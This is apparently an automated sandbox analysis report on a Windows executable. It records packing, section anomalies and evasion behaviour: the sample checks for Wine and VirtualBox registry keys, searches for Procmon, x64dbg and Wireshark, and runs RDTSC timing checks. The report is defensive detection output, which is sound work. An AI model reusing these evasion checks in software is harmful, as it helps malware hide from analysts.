Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeSection loaded: winrnr.dllJump to behavior
Source: iuO4kwUi17.exeStatic file information: File size 4480000 > 1048576
Source: iuO4kwUi17.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284c00
Source: iuO4kwUi17.exeStatic PE information: Raw size of lvvpaogd is bigger than: 0x100000 < 0x1bd400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\iuO4kwUi17.exeUnpacked PE file: 0.2.iuO4kwUi17.exe.7d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lvvpaogd:EW;aoltjaey:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lvvpaogd:EW;aoltjaey:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: iuO4kwUi17.exeStatic PE information: real checksum: 0x45447e should be: 0x4488c6
Source: iuO4kwUi17.exeStatic PE information: section name:
Source: iuO4kwUi17.exeStatic PE information: section name: .idata
Source: iuO4kwUi17.exeStatic PE information: section name:
Source: iuO4kwUi17.exeStatic PE information: section name: lvvpaogd
Source: iuO4kwUi17.exeStatic PE information: section name: aoltjaey
Source: iuO4kwUi17.exeStatic PE information: section name: .taggant
Source: iuO4kwUi17.exeStatic PE information: section name: lvvpaogd entropy: 7.956161259145636

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\iuO4kwUi17.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\iuO4kwUi17.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\iuO4kwUi17.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 108B501 second address: 108B507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109B371 second address: 109B37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F930851C676h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109B4BE second address: 109B4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD937h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109B80E second address: 109B817 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109B817 second address: 109B820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109B9CA second address: 109B9D0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109B9D0 second address: 109B9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109B9DA second address: 109B9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109BB47 second address: 109BB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9308CAD933h 0x0000000a pushad 0x0000000b jmp 00007F9308CAD92Bh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jng 00007F9308CAD926h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9308CAD92Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109BB82 second address: 109BB97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F930851C676h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109BB97 second address: 109BB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109BB9B second address: 109BBBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C683h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F930851C676h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109BBBC second address: 109BBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109BBC0 second address: 109BBD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C684h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109BBD8 second address: 109BBDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109BBDE second address: 109BBEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F930851C67Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109BBEF second address: 109BBFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007F9308CAD926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109BBFE second address: 109BC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E5E0 second address: 109E600 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9308CAD926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9308CAD92Ch 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E600 second address: 109E605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E605 second address: 109E62E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F9308CAD926h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F9308CAD933h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E62E second address: 109E69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F930851C678h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 and di, A1A0h 0x00000026 push 00000003h 0x00000028 mov dword ptr [ebp+122D1879h], eax 0x0000002e push 00000000h 0x00000030 or dword ptr [ebp+122D18F3h], ebx 0x00000036 push 00000003h 0x00000038 movsx edi, bx 0x0000003b mov edx, dword ptr [ebp+122D32B6h] 0x00000041 call 00007F930851C679h 0x00000046 jmp 00007F930851C688h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jc 00007F930851C676h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E69F second address: 109E6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E6A3 second address: 109E6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E6A9 second address: 109E6AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E6AE second address: 109E6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F930851C676h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F930851C68Dh 0x00000019 jmp 00007F930851C687h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E6DE second address: 109E6E8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9308CAD92Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E6E8 second address: 109E709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F930851C685h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E709 second address: 109E718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E718 second address: 109E71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E71F second address: 109E793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD935h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [ebp+122D3260h], eax 0x00000010 lea ebx, dword ptr [ebp+124562A2h] 0x00000016 pushad 0x00000017 jmp 00007F9308CAD930h 0x0000001c jng 00007F9308CAD92Ch 0x00000022 or dword ptr [ebp+122D183Eh], ebx 0x00000028 popad 0x00000029 jmp 00007F9308CAD936h 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F9308CAD937h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E793 second address: 109E7BA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F930851C67Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F930851C680h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E7BA second address: 109E7BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E8A6 second address: 109E8B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F930851C676h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 109E8B1 second address: 109E8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BF767 second address: 10BF78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F930851C687h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BF78B second address: 10BF7A1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9308CAD926h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jg 00007F9308CAD926h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 108D02A second address: 108D056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C67Fh 0x00000007 jmp 00007F930851C689h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BD64E second address: 10BD656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BD7D4 second address: 10BD7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BE1C4 second address: 10BE1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BE45C second address: 10BE464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BE464 second address: 10BE478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD92Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10B2E7B second address: 10B2E89 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F930851C67Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10B2E89 second address: 10B2E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10B2E8D second address: 10B2EC8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F930851C695h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F930851C682h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10B2EC8 second address: 10B2EFC instructions: 0x00000000 rdtsc 0x00000002 je 00007F9308CAD926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F9308CAD93Eh 0x00000014 push ebx 0x00000015 jc 00007F9308CAD926h 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10B2EFC second address: 10B2F1E instructions: 0x00000000 rdtsc 0x00000002 je 00007F930851C68Ah 0x00000008 jmp 00007F930851C67Eh 0x0000000d je 00007F930851C676h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10B2F1E second address: 10B2F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10B2F22 second address: 10B2F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BE8F1 second address: 10BE918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9308CAD92Dh 0x00000008 push edi 0x00000009 pop edi 0x0000000a jnl 00007F9308CAD926h 0x00000010 popad 0x00000011 jc 00007F9308CAD932h 0x00000017 ja 00007F9308CAD926h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BEFCE second address: 10BEFD8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F930851C676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BEFD8 second address: 10BEFDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BEFDE second address: 10BEFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BEFE2 second address: 10BEFFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD938h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
